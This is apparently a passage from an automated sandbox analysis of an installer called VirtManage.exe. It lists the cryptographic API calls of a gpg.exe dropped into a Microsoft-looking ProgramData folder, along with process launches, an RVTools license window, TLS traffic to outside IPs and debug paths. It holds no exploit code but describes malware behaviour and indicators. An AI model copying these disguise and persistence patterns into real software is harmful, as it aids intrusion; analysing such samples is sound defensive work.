Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00458059 gcry_free,gcry_cipher_close,gpgrt_log_debug,gpgrt_log_debug,gpgrt_log_debug,gcry_cipher_ctl,gcry_cipher_encrypt,gcry_cipher_gettag,gpg_strerror,gpgrt_log_error,1_2_00458059
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004561E6 gcry_cipher_get_algo_blklen,gcry_cipher_open,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_decrypt,gcry_cipher_ctl,1_2_004561E6
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00464220 gcry_cipher_open,gcry_sexp_release,gcry_free,gcry_free,gcry_free,gcry_cipher_close,gcry_free,gcry_cipher_setkey,gcry_free,gcry_sexp_release,gcry_sexp_build,gcry_free,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_sexp_build_array,gcry_free,gpgrt_snprintf,gcry_sexp_build,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gpg_strerror,gpgrt_log_error,gcry_sexp_build,gcry_sexp_build,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_malloc,gcry_cipher_encrypt,gcry_free,gcry_free,gcry_mpi_get_flag,gpg_strerror,_gpg_w32_gettext,gpgrt_log_error,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_opaque,gpgrt_log_info,gpg_strerror,gpgrt_log_error,_gpg_w32_gettext,gpgrt_log_info,gpg_err_code_from_syserror,gcry_free,gcry_free,_gpg_w32_gettext,gpgrt_log_info,gpg_strerror,gpgrt_log_error,gpgrt_log,abort,gpg_err_code_from_syserror,1_2_00464220
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00458420 gcry_malloc_secure,memcpy,gcry_cipher_open,gcry_cipher_close,gcry_free,gcry_free,gcry_malloc_secure,gcry_randomize,gcry_cipher_open,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_authenticate,memcpy,gcry_cipher_ctl,gcry_cipher_encrypt,gcry_cipher_gettag,gcry_calloc,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_encrypt,gpg_err_code_from_syserror,gpg_err_code_from_syserror,1_2_00458420
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_004564E7 gcry_cipher_decrypt,gcry_cipher_ctl,1_2_004564E7
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0044E530 gcry_mpi_get_flag,gcry_malloc_secure,memcpy,gcry_cipher_encrypt,memset,gcry_cipher_close,gcry_mpi_set_opaque,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpg_err_code_from_syserror,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,1_2_0044E530
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0044E677 gcry_cipher_encrypt,memset,gcry_cipher_close,gcry_mpi_set_opaque,gpgrt_log_printhex,1_2_0044E677
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00456631 gcry_md_write,gcry_free,gcry_md_get_algo_dlen,gcry_cipher_decrypt,gcry_md_write,gcry_md_ctl,1_2_00456631
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0044E920 gcry_mpi_get_flag,gcry_mpi_get_opaque,gcry_malloc_secure,memcpy,gcry_cipher_decrypt,gcry_cipher_close,gcry_mpi_scan,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpgrt_log_error,gcry_free,gcry_cipher_close,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,1_2_0044E920
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0044C9A0 gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_malloc,memcpy,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_mpi_release,gcry_mpi_release,gcry_sexp_build,gcry_free,gcry_mpi_release,gcry_mpi_get_opaque,gcry_free,gpgrt_log_debug,gcry_mpi_dump,gpgrt_log_printf,gpg_err_code_from_syserror,gcry_mpi_release,gcry_sexp_build,_gpgrt_log_assert,_gpgrt_log_assert,_gpgrt_log_assert,gcry_sexp_build,gcry_pk_testkey,gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_free,gpg_err_code_from_syserror,1_2_0044C9A0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0044CA78 gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,1_2_0044CA78
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0044EAB9 gcry_cipher_decrypt,gcry_cipher_close,gcry_mpi_scan,gcry_free,gpgrt_log_printhex,1_2_0044EAB9
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00454B00 _gpgrt_log_assert,gcry_cipher_decrypt,gcry_md_write,memcpy,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,_gpgrt_log_assert,_gpgrt_log_assert,gcry_cipher_decrypt,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,1_2_00454B00
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0044CD08 gcry_sexp_release,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_build,gcry_free,gcry_mpi_release,1_2_0044CD08
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00456E56 gcry_md_write,gcry_cipher_encrypt,gpgrt_log_info,1_2_00456E56
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0044CE61 gcry_sexp_release,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gpg_err_code_from_syserror,gcry_mpi_release,1_2_0044CE61
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00454EAC gcry_cipher_decrypt,1_2_00454EAC
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00427350 gcry_xcalloc,gpgrt_log_error,gcry_xcalloc,gcry_xcalloc,gcry_free,_gpg_w32_gettext,gpgrt_log_info,_gpg_w32_gettext,gpgrt_log_error,_gpg_w32_gettext,gpgrt_log_error,gcry_cipher_open,gcry_cipher_close,gpg_strerror,gpgrt_log_info,_gpg_w32_gettext,gpgrt_log_error,gpg_strerror,gpgrt_log_info,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_authenticate,gcry_cipher_ctl,gcry_cipher_decrypt,gcry_cipher_checktag,memcpy,gcry_cipher_close,gcry_cipher_decrypt,gcry_cipher_close,gpg_strerror,gpgrt_log_info,gcry_cipher_get_algo_keylen,gcry_cipher_close,gpgrt_log_debug,gcry_cipher_close,gcry_cipher_close,gcry_cipher_close,gpgrt_log_fatal,1_2_00427350
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00455326 memcpy,gpgrt_log_debug,gcry_cipher_ctl,gcry_cipher_decrypt,memcpy,memmove,gcry_cipher_checktag,1_2_00455326
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0046B3E0 gcry_free,gcry_sexp_release,gcry_free,gcry_free,_gpg_w32_gettext,gpg_strerror,gpgrt_log_error,gcry_malloc_secure,gcry_cipher_decrypt,gpgrt_log_info,gcry_sexp_canon_len,gcry_sexp_sscan,gcry_sexp_find_token,gcry_sexp_cadr,gcry_sexp_release,gcry_sexp_nth_string,gcry_pk_map_name,gcry_free,gcry_pk_algo_info,gcry_pk_algo_info,gcry_sexp_release,gcry_mpi_release,gcry_sexp_find_token,gcry_sexp_length,gcry_sexp_nth,gcry_sexp_nth_string,gcry_pk_map_name,gcry_calloc,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_release,gcry_sexp_extract_param,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_mpi_release,gcry_sexp_find_token,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_free,gcry_mpi_cmp,gcry_calloc,gcry_calloc,gcry_mpi_set_opaque,memset,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_sexp_find_token,gcry_mpi_release,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_release,gcry_sexp_nth_string,gcry_cipher_map_name,gcry_free,gcry_sexp_nth_data,memcpy,gcry_sexp_nth_string,strtol,gcry_free,gcry_sexp_nth_string,gcry_md_map_name,gcry_free,gcry_sexp_nth_data,memcpy,gcry_sexp_nth_string,strtoul,gcry_free,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_string,gcry_pk_map_name,gcry_free,gcry_pk_algo_info,gcry_pk_algo_info,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_sexp_nth_data,gcry_mpi_set_opaque_copy,gcry_mpi_set_flag,memcmp,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_sexp_extract_param,gpg_err_code_from_syserror,gcry_sexp_extract_param,gcry_free,gcry_sexp_release,gcry_sexp_release,gpg_err_code_from_syserror,_gpgrt_log_assert,gcry_mpi_set_flag,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_mpi_release,gcry_mpi_scan,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_string,gcry_sexp_release,gcry_sexp_release,gcry_mpi_cmp,gcry_mpi_get_flag,gcry_calloc,gpg_err_code_from_syserror,gcry_mpi_copy,gpgrt_log_error,gpg_err_code_from_syserror,_gpgrt_log_assert,gcry_mpi_release,gcry_sexp_extract_param,1_2_0046B3E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_0045766B gcry_cipher_get_algo_blklen,gcry_malloc,gcry_randomize,gcry_cipher_open,gcry_cipher_setkey,gpgrt_log_debug,gpgrt_log_debug,gcry_cipher_encrypt,gcry_cipher_gettag,1_2_0045766B
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00457B24 gcry_cipher_ctl,gpgrt_log_printhex,gcry_cipher_encrypt,gpgrt_log_printhex,1_2_00457B24
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00457C97 gpgrt_log_debug,gcry_cipher_encrypt,gcry_cipher_gettag,1_2_00457C97
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00457D09 gcry_cipher_ctl,gpgrt_log_printhex,gcry_cipher_encrypt,gpgrt_log_printhex,gpgrt_log_debug,1_2_00457D09
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 1_2_00457D3C gcry_cipher_ctl,gpgrt_log_printhex,gcry_cipher_encrypt,gpgrt_log_printhex,gpgrt_log_debug,1_2_00457D3C
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00458059 gcry_free,gcry_cipher_close,gpgrt_log_debug,gpgrt_log_debug,gpgrt_log_debug,gcry_cipher_ctl,gcry_cipher_encrypt,gcry_cipher_gettag,gpg_strerror,gpgrt_log_error,3_2_00458059
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004561E6 gcry_cipher_get_algo_blklen,gcry_cipher_open,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_decrypt,gcry_cipher_ctl,3_2_004561E6
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00464220 gcry_cipher_open,gcry_sexp_release,gcry_free,gcry_free,gcry_free,gcry_cipher_close,gcry_free,gcry_cipher_setkey,gcry_free,gcry_sexp_release,gcry_sexp_build,gcry_free,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_sexp_build_array,gcry_free,gpgrt_snprintf,gcry_sexp_build,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gpg_strerror,gpgrt_log_error,gcry_sexp_build,gcry_sexp_build,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_malloc,gcry_cipher_encrypt,gcry_free,gcry_free,gcry_mpi_get_flag,gpg_strerror,_gpg_w32_gettext,gpgrt_log_error,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_opaque,gpgrt_log_info,gpg_strerror,gpgrt_log_error,_gpg_w32_gettext,gpgrt_log_info,gpg_err_code_from_syserror,gcry_free,gcry_free,_gpg_w32_gettext,gpgrt_log_info,gpg_strerror,gpgrt_log_error,gpgrt_log,abort,gpg_err_code_from_syserror,3_2_00464220
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00458420 gcry_malloc_secure,memcpy,gcry_cipher_open,gcry_cipher_close,gcry_free,gcry_free,gcry_malloc_secure,gcry_randomize,gcry_cipher_open,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_authenticate,memcpy,gcry_cipher_ctl,gcry_cipher_encrypt,gcry_cipher_gettag,gcry_calloc,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_encrypt,gpg_err_code_from_syserror,gpg_err_code_from_syserror,3_2_00458420
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_004564E7 gcry_cipher_decrypt,gcry_cipher_ctl,3_2_004564E7
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044E530 gcry_mpi_get_flag,gcry_malloc_secure,memcpy,gcry_cipher_encrypt,memset,gcry_cipher_close,gcry_mpi_set_opaque,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpg_err_code_from_syserror,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,3_2_0044E530
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044E677 gcry_cipher_encrypt,memset,gcry_cipher_close,gcry_mpi_set_opaque,gpgrt_log_printhex,3_2_0044E677
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00456631 gcry_md_write,gcry_free,gcry_md_get_algo_dlen,gcry_cipher_decrypt,gcry_md_write,gcry_md_ctl,3_2_00456631
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044E920 gcry_mpi_get_flag,gcry_mpi_get_opaque,gcry_malloc_secure,memcpy,gcry_cipher_decrypt,gcry_cipher_close,gcry_mpi_scan,gcry_free,gpgrt_log_error,gcry_cipher_close,gpgrt_log_printhex,gpgrt_log_error,gcry_free,gcry_cipher_close,gpgrt_log_printhex,gpg_strerror,gpgrt_log_error,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_cipher_close,3_2_0044E920
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044C9A0 gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_malloc,memcpy,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_mpi_release,gcry_mpi_release,gcry_sexp_build,gcry_free,gcry_mpi_release,gcry_mpi_get_opaque,gcry_free,gpgrt_log_debug,gcry_mpi_dump,gpgrt_log_printf,gpg_err_code_from_syserror,gcry_mpi_release,gcry_sexp_build,_gpgrt_log_assert,_gpgrt_log_assert,_gpgrt_log_assert,gcry_sexp_build,gcry_pk_testkey,gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_free,gpg_err_code_from_syserror,3_2_0044C9A0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044CA78 gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,3_2_0044CA78
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044EAB9 gcry_cipher_decrypt,gcry_cipher_close,gcry_mpi_scan,gcry_free,gpgrt_log_printhex,3_2_0044EAB9
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00454B00 _gpgrt_log_assert,gcry_cipher_decrypt,gcry_md_write,memcpy,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,_gpgrt_log_assert,_gpgrt_log_assert,gcry_cipher_decrypt,gcry_cipher_close,gcry_md_close,gcry_free,_gpgrt_log_assert,3_2_00454B00
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044CD08 gcry_sexp_release,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_build,gcry_free,gcry_mpi_release,3_2_0044CD08
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00456E56 gcry_md_write,gcry_cipher_encrypt,gpgrt_log_info,3_2_00456E56
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0044CE61 gcry_sexp_release,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gpg_err_code_from_syserror,gcry_mpi_release,3_2_0044CE61
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00454EAC gcry_cipher_decrypt,3_2_00454EAC
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00427350 gcry_xcalloc,gpgrt_log_error,gcry_xcalloc,gcry_xcalloc,gcry_free,_gpg_w32_gettext,gpgrt_log_info,_gpg_w32_gettext,gpgrt_log_error,_gpg_w32_gettext,gpgrt_log_error,gcry_cipher_open,gcry_cipher_close,gpg_strerror,gpgrt_log_info,_gpg_w32_gettext,gpgrt_log_error,gpg_strerror,gpgrt_log_info,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_authenticate,gcry_cipher_ctl,gcry_cipher_decrypt,gcry_cipher_checktag,memcpy,gcry_cipher_close,gcry_cipher_decrypt,gcry_cipher_close,gpg_strerror,gpgrt_log_info,gcry_cipher_get_algo_keylen,gcry_cipher_close,gpgrt_log_debug,gcry_cipher_close,gcry_cipher_close,gcry_cipher_close,gpgrt_log_fatal,3_2_00427350
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00455326 memcpy,gpgrt_log_debug,gcry_cipher_ctl,gcry_cipher_decrypt,memcpy,memmove,gcry_cipher_checktag,3_2_00455326
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0046B3E0 gcry_free,gcry_sexp_release,gcry_free,gcry_free,_gpg_w32_gettext,gpg_strerror,gpgrt_log_error,gcry_malloc_secure,gcry_cipher_decrypt,gpgrt_log_info,gcry_sexp_canon_len,gcry_sexp_sscan,gcry_sexp_find_token,gcry_sexp_cadr,gcry_sexp_release,gcry_sexp_nth_string,gcry_pk_map_name,gcry_free,gcry_pk_algo_info,gcry_pk_algo_info,gcry_sexp_release,gcry_mpi_release,gcry_sexp_find_token,gcry_sexp_length,gcry_sexp_nth,gcry_sexp_nth_string,gcry_pk_map_name,gcry_calloc,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_release,gcry_sexp_extract_param,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_mpi_release,gcry_sexp_find_token,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_free,gcry_mpi_cmp,gcry_calloc,gcry_calloc,gcry_mpi_set_opaque,memset,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_sexp_find_token,gcry_mpi_release,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_release,gcry_sexp_nth_string,gcry_cipher_map_name,gcry_free,gcry_sexp_nth_data,memcpy,gcry_sexp_nth_string,strtol,gcry_free,gcry_sexp_nth_string,gcry_md_map_name,gcry_free,gcry_sexp_nth_data,memcpy,gcry_sexp_nth_string,strtoul,gcry_free,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_string,gcry_pk_map_name,gcry_free,gcry_pk_algo_info,gcry_pk_algo_info,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_sexp_nth_data,gcry_mpi_set_opaque_copy,gcry_mpi_set_flag,memcmp,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_sexp_extract_param,gpg_err_code_from_syserror,gcry_sexp_extract_param,gcry_free,gcry_sexp_release,gcry_sexp_release,gpg_err_code_from_syserror,_gpgrt_log_assert,gcry_mpi_set_flag,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_mpi_release,gcry_mpi_scan,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_string,gcry_sexp_release,gcry_sexp_release,gcry_mpi_cmp,gcry_mpi_get_flag,gcry_calloc,gpg_err_code_from_syserror,gcry_mpi_copy,gpgrt_log_error,gpg_err_code_from_syserror,_gpgrt_log_assert,gcry_mpi_release,gcry_sexp_extract_param,3_2_0046B3E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0045766B gcry_cipher_get_algo_blklen,gcry_malloc,gcry_randomize,gcry_cipher_open,gcry_cipher_setkey,gpgrt_log_debug,gpgrt_log_debug,gcry_cipher_encrypt,gcry_cipher_gettag,3_2_0045766B
Source: C:\Users\user\Desktop\VirtManage.exeEXE: msiexec.exeJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeEXE: sc.exeJump to behavior

Compliance

barindex
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\VirtManage.exeEXE: msiexec.exeJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeEXE: sc.exeJump to behavior
Uses 32bit PE files
Source: VirtManage.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Found installer window with terms and condition text
Source: C:\Windows\SysWOW64\msiexec.exeWindow detected: < &BackLicense AgreementDefBannerBitmapMsiHorizontalLinePlease take a moment to read the license agreement now. If you accept the terms below click "I Agree" then "Next". Otherwise click "Cancel".This End User License Agreement (EULA) is between the individual consumer or business entity that will use the Application (You) and Dell Global B.V. (Singapore Branch) the Singapore branch of a company incorporated in The Netherlands with limited liability located at 2 International Business Park The Strategy Tower 2 #01-34 Singapore 609930 (Licensor). This EULA governs Your use of: (a) the object code version of RVTools; (b) updates to such software (Updates); (c) the documentation for such software; and (d) all copies of the foregoing (collectively Application). If You accept this EULA or if You install or use the Application then You agree to this EULA. If You accept this EULA or install or use the Application on behalf of a business entity then You represent that You have authority to take those actions and this EULA will be binding on that business entity. 1. License Grant. 1.1. Right to Use. Subject to and in consideration of your full compliance with the terms and conditions of this EULA Licensor grants to You a personal nonexclusive non-transferable and revocable license to use the Application in accordance with the terms of this EULA. If You are an individual consumer this license grant allows You to use the Application in connection with Your own personal use. If You are a business entity this license grant allows You to use the Application in connection with the internal business operations of Your entity. In addition You may make a reasonable number of copies of the Application solely as needed for backup or archival purposes. 1.2. Third Party Use. If You are a business entity You may allow Your contractors (each a Permitted Third Party) to use the Application solely for the purpose of providing services to You provided that such use is in compliance with this EULA. You are liable for any breach of this EULA by any Permitted Third Party. 1.3. Rights Reserved. The Application is licensed and not sold. Except for the license expressly granted in this EULA Licensor on behalf of itself and its affiliates and suppliers retains all rights in and to the Application. The rights in the Application are valid and protected in all forms media and technologies existing now or hereafter developed. Any use of the Application other than as expressly set forth herein is strictly prohibited. 1.4. Ownership. Licensor on behalf of itself and its affiliates retains ownership of the Application and all related intellectual property rights. If Application is provided to You on removable media (e.g. CD DVD or USB drive) You may own the media on which the Application is recorded. 2. License Conditions. 2.1. You and Your Permitted Third Parties must do the following: A. Run the Application only on the hardware for which it was intended to operate when ap
Source: C:\Windows\SysWOW64\msiexec.exeWindow detected: < &BackLicense AgreementDefBannerBitmapMsiHorizontalLinePlease take a moment to read the license agreement now. If you accept the terms below click "I Agree" then "Next". Otherwise click "Cancel".This End User License Agreement (EULA) is between the individual consumer or business entity that will use the Application (You) and Dell Global B.V. (Singapore Branch) the Singapore branch of a company incorporated in The Netherlands with limited liability located at 2 International Business Park The Strategy Tower 2 #01-34 Singapore 609930 (Licensor). This EULA governs Your use of: (a) the object code version of RVTools; (b) updates to such software (Updates); (c) the documentation for such software; and (d) all copies of the foregoing (collectively Application). If You accept this EULA or if You install or use the Application then You agree to this EULA. If You accept this EULA or install or use the Application on behalf of a business entity then You represent that You have authority to take those actions and this EULA will be binding on that business entity. 1. License Grant. 1.1. Right to Use. Subject to and in consideration of your full compliance with the terms and conditions of this EULA Licensor grants to You a personal nonexclusive non-transferable and revocable license to use the Application in accordance with the terms of this EULA. If You are an individual consumer this license grant allows You to use the Application in connection with Your own personal use. If You are a business entity this license grant allows You to use the Application in connection with the internal business operations of Your entity. In addition You may make a reasonable number of copies of the Application solely as needed for backup or archival purposes. 1.2. Third Party Use. If You are a business entity You may allow Your contractors (each a Permitted Third Party) to use the Application solely for the purpose of providing services to You provided that such use is in compliance with this EULA. You are liable for any breach of this EULA by any Permitted Third Party. 1.3. Rights Reserved. The Application is licensed and not sold. Except for the license expressly granted in this EULA Licensor on behalf of itself and its affiliates and suppliers retains all rights in and to the Application. The rights in the Application are valid and protected in all forms media and technologies existing now or hereafter developed. Any use of the Application other than as expressly set forth herein is strictly prohibited. 1.4. Ownership. Licensor on behalf of itself and its affiliates retains ownership of the Application and all related intellectual property rights. If Application is provided to You on removable media (e.g. CD DVD or USB drive) You may own the media on which the Application is recorded. 2. License Conditions. 2.1. You and Your Permitted Third Parties must do the following: A. Run the Application only on the hardware for which it was intended to operate when ap
PE / OLE file has a valid certificate
Source: VirtManage.exeStatic PE information: certificate valid
Uses secure TLS version for HTTPS connections
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49692 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.153.11:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49793 version: TLS 1.2
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: VirtManage.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Binary contains paths to debug symbols
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb source: 7za.exe, 00000007.00000003.965422387.000001FFA43E0000.00000004.00001000.00020000.00000000.sdmp, MSI2C66.tmp.9.dr, MSI2CE4.tmp.9.dr
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb= source: 7za.exe, 00000007.00000003.965422387.000001FFA43E0000.00000004.00001000.00020000.00000000.sdmp, MSI2C66.tmp.9.dr, MSI2CE4.tmp.9.dr
